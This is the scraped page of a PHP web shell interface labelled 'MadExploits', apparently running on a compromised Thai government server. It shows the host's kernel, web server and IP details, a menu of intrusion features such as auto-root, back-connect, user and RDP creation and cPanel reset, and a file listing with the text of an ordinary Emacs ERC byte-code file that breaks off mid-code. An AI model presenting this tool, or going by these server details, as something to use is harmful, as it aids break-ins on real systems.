Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
erc /
[ HOME SHELL ]
Name
Size
Permission
Action
erc-autoaway.elc
11.58
KB
-rw-r--r--
erc-backend.elc
154.28
KB
-rw-r--r--
erc-button.elc
16.69
KB
-rw-r--r--
erc-capab.elc
7.67
KB
-rw-r--r--
erc-compat.elc
4.38
KB
-rw-r--r--
erc-dcc.elc
39.39
KB
-rw-r--r--
erc-ezbounce.elc
5.19
KB
-rw-r--r--
erc-fill.elc
6.71
KB
-rw-r--r--
erc-goodies.elc
32.55
KB
-rw-r--r--
erc-hecomplete.elc
7.96
KB
-rw-r--r--
erc-ibuffer.elc
6.77
KB
-rw-r--r--
erc-identd.elc
4.86
KB
-rw-r--r--
erc-imenu.elc
2.61
KB
-rw-r--r--
erc-join.elc
6.03
KB
-rw-r--r--
erc-lang.elc
4.68
KB
-rw-r--r--
erc-list.elc
9.25
KB
-rw-r--r--
erc-log.elc
14.83
KB
-rw-r--r--
erc-match.elc
19.02
KB
-rw-r--r--
erc-menu.elc
6.15
KB
-rw-r--r--
erc-netsplit.elc
7.94
KB
-rw-r--r--
erc-networks.elc
39.94
KB
-rw-r--r--
erc-notify.elc
9.37
KB
-rw-r--r--
erc-page.elc
4.88
KB
-rw-r--r--
erc-pcomplete.elc
10.62
KB
-rw-r--r--
erc-replace.elc
3.85
KB
-rw-r--r--
erc-ring.elc
5.21
KB
-rw-r--r--
erc-services.elc
15.01
KB
-rw-r--r--
erc-sound.elc
5.59
KB
-rw-r--r--
erc-speedbar.elc
10
KB
-rw-r--r--
erc-spelling.elc
4.66
KB
-rw-r--r--
erc-stamp.elc
14.9
KB
-rw-r--r--
erc-track.elc
34.83
KB
-rw-r--r--
erc-truncate.elc
4.18
KB
-rw-r--r--
erc-xdcc.elc
5.74
KB
-rw-r--r--
erc.elc
219.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : erc-stamp.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:03:05 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/erc/erc-stamp.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`erc-stamp.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\210\303\304\305\306\307\301%\207" [require erc erc-compat custom-declare-group erc-stamp nil "For long conversation on IRC it is sometimes quite\nuseful to have individual messages timestamp. This\ngroup provides settings related to the format and display\nof timestamp information in `erc-mode' buffer.\n\nFor timestamping to be activated, you just need to load `erc-stamp'\nin your .emacs file or interactively using `load-library'." :group] 6) #@178 *If set to a string, messages will be timestamped. This string is processed using `format-time-string'. Good examples are "%T" and "%H:%M". If nil, timestamping is turned off. (custom-declare-variable 'erc-timestamp-format '"[%H:%M]" '(#$ . -1097) :group 'erc-stamp :type '(choice (const nil) (string))) #@334 *If set to a string, messages will be timestamped. This string is processed using `format-time-string'. Good examples are "%T" and "%H:%M". This timestamp is used for timestamps on the left side of the screen when `erc-insert-timestamp-function' is set to `erc-insert-timestamp-left-and-right'. If nil, timestamping is turned off. (custom-declare-variable 'erc-timestamp-format-left '"\n[%a %b %e %Y]\n" '(#$ . -1409) :group 'erc-stamp :type '(choice (const nil) (string))) #@335 *If set to a string, messages will be timestamped. This string is processed using `format-time-string'. Good examples are "%T" and "%H:%M". This timestamp is used for timestamps on the right side of the screen when `erc-insert-timestamp-function' is set to `erc-insert-timestamp-left-and-right'. If nil, timestamping is turned off. (custom-declare-variable 'erc-timestamp-format-right '" [%H:%M]" '(#$ . -1892) :group 'erc-stamp :type '(choice (const nil) (string))) #@420 *Function to use to insert timestamps. It takes a single argument STRING which is the final string which all text-properties already appended. This function only cares about inserting this string at the right position. Narrowing is in effect while it is called, so (point-min) and (point-max) determine the region to operate on. You will probably want to set `erc-insert-away-timestamp-function' to the same value. (custom-declare-variable 'erc-insert-timestamp-function ''erc-insert-timestamp-left-and-right '(#$ . -2368) :group 'erc-stamp :type '(choice (const :tag "Both sides" erc-insert-timestamp-left-and-right) (const :tag "Right" erc-insert-timestamp-right) (const :tag "Left" erc-insert-timestamp-left) function)) #@193 *Timestamp format used when marked as being away. If nil, timestamping is turned off when away unless `erc-timestamp-format' is set. If `erc-timestamp-format' is set, this will not be used. (custom-declare-variable 'erc-away-timestamp-format '"<%H:%M>" '(#$ . -3102) :group 'erc-stamp :type '(choice (const nil) (string))) #@98 *Function to use to insert the away timestamp. See `erc-insert-timestamp-function' for details. (custom-declare-variable 'erc-insert-away-timestamp-function ''erc-insert-timestamp-left-and-right '(#$ . -3433) :group 'erc-stamp :type '(choice (const :tag "Both sides" erc-insert-timestamp-left-and-right) (const :tag "Right" erc-insert-timestamp-right) (const :tag "Left" erc-insert-timestamp-left) function)) #@158 *If non-nil, timestamps will be invisible. This is useful for logging, because, although timestamps will be hidden, they will still be present in the logs. (custom-declare-variable 'erc-hide-timestamps 'nil '(#$ . -3850) :group 'erc-stamp :type 'boolean) #@216 *If non-nil, print timestamp in the minibuffer when point is moved. Using this variable, you can turn off normal timestamping, and simply move point to an irc message to see its timestamp printed in the minibuffer. (custom-declare-variable 'erc-echo-timestamps 'nil '(#$ . -4113) :group 'erc-stamp :type 'boolean) #@148 *Format string to be used when `erc-echo-timestamps' is non-nil. This string specifies the format of the timestamp being echoed in the minibuffer. (custom-declare-variable 'erc-echo-timestamp-format '"Timestamped %A, %H:%M:%S" '(#$ . -4434) :group 'erc-stamp :type 'string) #@117 *Whether the timestamps should be intangible, i.e. prevent the point from entering them and instead jump over them. (custom-declare-variable 'erc-timestamp-intangible 't '(#$ . -4715) :group 'erc-stamp :type 'boolean) (custom-declare-face 'erc-timestamp-face '((t (:bold t :foreground "green"))) "ERC timestamp face." :group 'erc-faces) #@263 Non-nil if Erc-Stamp mode is enabled. See the command `erc-stamp-mode' for a description of this minor mode. Setting this variable directly does not take effect; either customize it (see the info node `Easy Customization') or call the function `erc-stamp-mode'. (custom-declare-variable 'erc-stamp-mode 'nil '(#$ . 5059) :set 'custom-set-minor-mode :initialize 'custom-initialize-default :group 'erc-stamp :type 'boolean) #@143 Toggle ERC stamp mode. With arg, turn ERC stamp mode on if and only if arg is positive. This mode timestamps messages in the channel buffers. (defalias 'erc-stamp-mode #[(&optional arg) "\303 \304=\203 \n?\202( \203 \305 !\306V\202( \n\204\"